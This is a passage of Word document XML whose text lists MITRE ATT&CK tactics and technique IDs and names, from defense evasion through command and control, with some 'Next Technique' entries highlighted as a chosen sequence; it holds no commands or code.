          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988737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T1562.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify System Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C29CBC"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T1562.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable Windows Event Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F039F7B"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T1070.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timestomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0909FA9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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF4294" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00CE6087" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6087">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE6087">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE6087">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A0BCC"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A735765"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T1548.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Abuse Elevation Control Mechanism&gt;:Bypass User Account Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC7FB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T1027.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Software Packing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEBF735"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T1550.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377656C"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267AD0C7"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lastRenderedPageBreak/>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1621', 'T1555.003', 'T1539', 'T1110.003', 'T1606.001', 'T1606.002', 'T1003.006', 'T1558.003', 'T1555', 'T1552.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8356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1621 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-Factor Authentication Request Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601501A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T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDA36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1539 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Steal Web Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2C604"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T1110.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A935D4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T1606.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Forge Web Credentials&gt;:Web Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D12E7"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T1606.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Forge Web Credentials&gt;:SAML Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AF9AA"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T1003.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01C8CF1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T1558.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Steal or Forge Kerberos Tickets&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FBE7C0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1555 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials from Password Stores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7FE7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T1552.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Unsecured Credentials&gt;:Private Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB073B"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1087.004', 'T1069.002', 'T1087.002', 'T1087', 'T1083', 'T1069', 'T1482', 'T1057', 'T1082', 'T1018', 'T1016.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B14C0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T1087.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Cloud Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDBFF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T1069.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Permission Groups Discovery&gt;:Domain Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67796AD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T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805E38D"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1087 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Account Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7705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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D847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1069 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Permission Groups Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEF67F4"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1482 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Domain Trust Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773C14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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9844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r w:rsidRPr="00412964">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00412964">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00412964">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E44AF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1018 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781CE84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T1016.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Network Configuration Discovery&gt;:Internet Connection Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806EF7E"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1550.001', 'T1021.002', 'T1021.001', 'T1550', 'T1550.004', 'T1021.006', 'T1550.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E5B37"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T1550.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Application Access Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E076C" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="006412BA" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006412BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006412BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FAE2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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818C19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1550 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Alternate Authentication Material</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6C8BE"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T1550.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Web Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FFE8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T1021.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A49B9F"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T1550.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2F20A"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1213', 'T1213.003', 'T1560.001', 'T1114.002', 'T1074.002', 'T1005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C23DA"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1213 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Information Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F384135"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T1213.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data from Information Repositories&gt;:Code Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A4E05"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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFDF66"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T1114.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Email Collection&gt;:Remote Email Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A0DC3"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T1074.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Remote Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745EFD81"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B302DE1"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1573', 'T1105', 'T1568', 'T1071.001', 'T1090.001', 'T1102.002', 'T1001.002', 'T1095', 'T1090.003', 'T1090.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CFFDC"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1573 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Encrypted Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D05CC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1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088457E7"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1568 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dynamic Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CEAF8" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00EC2C26" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
